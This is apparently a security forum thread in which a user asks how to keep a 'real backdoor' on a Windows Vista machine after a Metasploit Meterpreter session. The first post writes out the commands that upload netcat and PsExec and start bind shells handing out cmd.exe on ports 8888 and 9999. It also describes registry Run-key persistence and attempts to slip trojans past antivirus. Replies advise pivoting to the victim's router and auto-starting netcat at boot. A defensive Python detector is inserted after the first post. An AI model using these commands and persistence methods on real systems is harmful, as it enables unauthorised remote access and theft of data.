Page 1 of 5 (results 1 to 10 of 45)

Thread: Opening backdoor after getting meterpreter session

#1 kazalku (Member, joined Feb 2009, 416 posts)

    Opening backdoor after getting meterpreter session

    Greetings everybody... Straight to the point, shall we?

    OK........ scenario first. In my closed lab environment, I've set up 2 different internet connections with (obviously) different IP addresses:
    Victim's IP is 82.24.180.15, running Vista Home Edition SP1.
    Attacker's IP is 82.24.182.14, running BT3, most updated MSF.

    I can successfully connect to the vista box by following this exploitation tutorial:
    http://forums.remote-exploit.org/showthread.php?t=19129

    After getting the meterpreter session, I opened 2 backdoors in the vista box for future invasion.

    Code:
    cd c:\
    mkdir xxx
    ls
    cd xxx
    upload /root/nc111nt/nc.exe nc.exe
    upload /root/PsTools/psexec.exe psexec.exe
    execute -f cmd.exe -c -H -i
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 9999

    Then I ended the meterpreter session. Previously, I configured (port-forwarding) the victim's router to forward port 9999 requests to 192.168.1.2 (which is static for the vista laptop). I know that this may not be possible in the real world.

    Now, from the BT3 box:
    Code:
    nc 82.24.180.15 9999 =======> works & gives the command shell
    nc 82.24.180.15 8888 =======> does not work

    I can easily understand why the 2nd command is not working, because we didn't ask the router to forward 8888 requests to the vista box. And, as I mentioned earlier, in the real world I (or the attacker) wouldn't be able to configure the router. OR am I wrong? It's really tough to think that I can access another router without actually connecting to it (unless remote management is enabled by some dumb **s).

    Now, I tried a few other things:
    1) Tried "Back Orifice 2000" from SourceForge, but couldn't upload it because of the AV (Avast!, really good). So I didn't go further. I'm sure that the AV will catch "Sub7" etc. as well.

    2) Saved the exe file in the Windows folder & edited the remote registry to run it every time the computer restarts. This one works, but this is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts), & if I miss it then I will have to wait until the other one restarts.

    Any ideas how to open a REAL backdoor? Thanks, and if you could kindly point me towards further reading/tutorials that would be great. Thanks guys.
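Added here as an example for this thread, not code from any of the posts: a small detector, written from the defender's side, for the two artifacts the first post leaves behind, a netcat bind shell (listen flag plus "-e cmd.exe -p N") started under the PsExec service, and a Run-key value that relaunches it at boot. The process records and Run-key values are constructed; the "image|parent|command line" shape and the parent name psexesvc.exe are assumptions about how Sysmon/EDR telemetry would be fed in.

```python
import re

# Constructed sample telemetry (not from the original post): process-creation
# records as "image|parent image|command line", plus HKLM Run-key values.
SAMPLE_PROCESSES = [
    r"c:\xxx\nc.exe|c:\windows\psexesvc.exe|c:\xxx\nc.exe -L -d -e cmd.exe -p 8888",
    r"c:\xxx\nc.exe|c:\windows\psexesvc.exe|c:\xxx\nc.exe -L -d -e cmd.exe -p 9999",
    r"c:\windows\system32\cmd.exe|c:\windows\explorer.exe|cmd.exe /c dir",
    r"c:\tools\nc.exe|c:\windows\system32\cmd.exe|nc.exe -zv 192.168.1.1 80",
]
SAMPLE_RUN_KEYS = {  # value name -> data (constructed)
    "Updater": r"c:\windows\nc.exe -L -d -e cmd.exe -p 9999",
    "OneDrive": r"c:\users\u\onedrive.exe /background",
}
SHELLS = ("cmd.exe", "powershell.exe", "cmd", "powershell")

def bind_shell_port(cmdline):
    """Return the listening port if the command line is a netcat-style bind
    shell (listens with -l/-L and hands the socket to a shell via -e),
    otherwise None. -L is the Windows netcat "listen harder" flag."""
    argv = cmdline.split()
    listens = any(a in ("-l", "-L") for a in argv)
    spawns_shell = any(
        a.lower() == "-e" and i + 1 < len(argv) and argv[i + 1].lower() in SHELLS
        for i, a in enumerate(argv)
    )
    if not (listens and spawns_shell):
        return None
    m = re.search(r"(?:^|\s)-p\s+(\d{1,5})(?:\s|$)", cmdline)
    return int(m.group(1)) if m else 0  # 0: listens, but port not on the command line

def find_bind_shells(records):
    """Return (image, parent, port) for every process record that is a bind shell."""
    hits = []
    for rec in records:
        image, parent, cmdline = rec.split("|", 2)
        port = bind_shell_port(cmdline)
        if port is not None:
            hits.append((image.lower(), parent.lower(), port))
    return hits

def suspicious_run_keys(run_keys):
    """Names of Run-key values whose data would start a bind shell at logon."""
    return sorted(n for n, d in run_keys.items() if bind_shell_port(d) is not None)

if __name__ == "__main__":
    for image, parent, port in find_bind_shells(SAMPLE_PROCESSES):
        print(f"bind shell: {image} (parent {parent}) listening on tcp/{port}")
    for name in suspicious_run_keys(SAMPLE_RUN_KEYS):
        print(f"persistence: Run value {name!r} launches a bind shell")
```

The same check applied to a netstat listing of LISTENING ports owned by an unexpected image gives a second, host-side signal for the listener the first post opens on 8888 and 9999.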

#2

    Well, actually, you are able to access the router's setup page either through the routing feature that metasploit has (which enables you to port scan/access other machines on the network, as was stated in my tutorial), or by uploading and installing links for Windows (a text-based browser, which you could use to navigate to the router's setup page). That'll work fine, and just get netcat to start up with the PC every time - that's a reasonable backdoor, and works just fine; does everything you'd need it to.

    ~phoenix910

#3 KMDave (Moderator, joined Jan 2010, 2,281 posts)

    @OP:
    You should define what you expect a backdoor to do.
    As phoenix910 stated, a simple NC is already a backdoor. Back Orifice and Sub7 are trojans with all that stupid stuff like ejecting the CD drive and so on. Or you could also install a VNC server instead of, or in addition to, NC.
    Tiocfaidh ár lá

#4 kazalku (Member, joined Feb 2009, 416 posts)

    Quote Originally Posted by phoenix910:
    Well, actually, you are able to access the router's setup page either through the routing feature that metasploit has (which enables you to port scan/access other machines on the network, as was stated in my tutorial), or by uploading and installing links for Windows (a text-based browser, which you could use to navigate to the router's setup page). That'll work fine, and just get netcat to start up with the PC every time - that's a reasonable backdoor, and works just fine; does everything you'd need it to.

    ~phoenix910
    "text based browser" seems interesting, I'll have a look....
    and yeah, I'm happy to connect via nc, as long as it "connects"...
    Thanks a lot

    Quote Originally Posted by KMDave:
    @OP:
    Back Orifice and Sub7 are trojans with all that stupid stuff like ejecting the CD drive and so on. Or you could also install a VNC server instead of or in addition to NC.
    I was just trying those because I was unable to use nc.... really, I don't want to use those stupid trojans..... there is no charm in using those....

    And I was just wondering - wouldn't a VNC server be a little bit "noisy"?
    Thanks

#5 Good friend of the forums (joined Jun 2008, 425 posts)

    Quote Originally Posted by kazalku:
    And I was just wondering - wouldn't a VNC server be a little bit "noisy"?
    And NC isn't?

#6 KMDave (Moderator, joined Jan 2010, 2,281 posts)

    Depending on how you hide it.

    Sure, the issue is that you can only access the machine while it is running. If it is a desktop machine you will have little to no chance to really use VNC as a backdoor.

    That's why I was asking which purpose you want the backdoor to fit. Why is NC no option?
    Tiocfaidh ár lá

#7 kazalku (Member, joined Feb 2009, 416 posts)

    Quote Originally Posted by KMDave:
    That's why I was asking which purpose you want the backdoor to fit.
    Now, I'm just learning. However, in the real world I would like to perform this in my work area (after getting permission) to increase people's awareness about being updated. My main goal is to play around with the remote file storage system, company-sensitive information stored as doc & pdf files. So, NC is good enough for me.

    Quote Originally Posted by KMDave:
    Why is NC no option?
    And I didn't say this.....

#8 KMDave (Moderator, joined Jan 2010, 2,281 posts)

    Oh sorry,

    I thought that you meant it is not an option to use when you said "unable to use".
    Tiocfaidh ár lá

#9 kazalku (Member, joined Feb 2009, 416 posts)

    Quote Originally Posted by phoenix910:
    Well, actually, you are able to access the router's setup page either through the routing feature that metasploit has (which enables you to port scan/access other machines on the network, as was stated in my tutorial),.............
    I tried it, although to be honest the process is not fully clear to me.
    Why "Invalid gateway specified"........ "route print" doesn't show anything.
    meterpreter > route

    Network routes
    ==============

    Subnet           Netmask          Gateway
    ------           -------          -------
    0.0.0.0          0.0.0.0          192.168.1.1
    127.0.0.0        255.0.0.0        127.0.0.1
    127.0.0.1        255.255.255.255  127.0.0.1
    127.255.255.255  255.255.255.255  127.0.0.1
    192.168.1.0      255.255.255.0    192.168.1.2
    192.168.1.2      255.255.255.255  192.168.1.2
    192.168.1.255    255.255.255.255  192.168.1.2
    224.0.0.0        240.0.0.0        127.0.0.1
    224.0.0.0        240.0.0.0        192.168.1.2
    255.255.255.255  255.255.255.255  127.0.0.1
    255.255.255.255  255.255.255.255  192.168.1.2

    meterpreter >
    Background session 3? [y/N]
    msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
    [-] Invalid gateway specified.
    msf exploit(handler) >

    I know that I'm completely missing something, but I like to learn while playing.......

    Quote Originally Posted by phoenix910:
    or by uploading and installing links for Windows (a text-based browser, which you could use to navigate to the router's setup page). That'll work fine ..........
    Well, so far I've uploaded the browser files on the vista box. Locally it works fine. But remotely:

    c:\xxx>dir
    dir
     Volume in drive C is OS
     Volume Serial Number is 5684-D9A1

     Directory of c:\xxx

    10/03/2009  20:38    <DIR>          .
    10/03/2009  20:38    <DIR>          ..
    10/03/2009  20:38           131,462 lynx.cfg
    10/03/2009  20:34         1,161,728 lynx.exe
    05/03/2009  23:13            61,440 nc.exe
    05/03/2009  23:13           234,536 psexec.exe
                   4 File(s)      1,589,166 bytes
                   2 Dir(s)  107,945,242,624 bytes free

    c:\xxx>lynx.exe yahoo.com
    lynx.exe yahoo.com
    LINES value must be >= 2: got 1
    initscr(): LINES=1 COLS=1: too small.

    c:\xxx>lynx.exe google.com
    lynx.exe google.com
    LINES value must be >= 2: got 1
    initscr(): LINES=1 COLS=1: too small.

    c:\xxx>lynx.exe 192.168.1.1
    lynx.exe 192.168.1.1
    LINES value must be >= 2: got 1
    initscr(): LINES=1 COLS=1: too small.

    Any ideas??

#10

    I use "links", as opposed to "lynx", but whatever floats your boat. Also, as per my tutorial, just execute "links" and make sure you're interacting with the process; then you can tell it to browse to yahoo.com from there.

    ~phoenix910
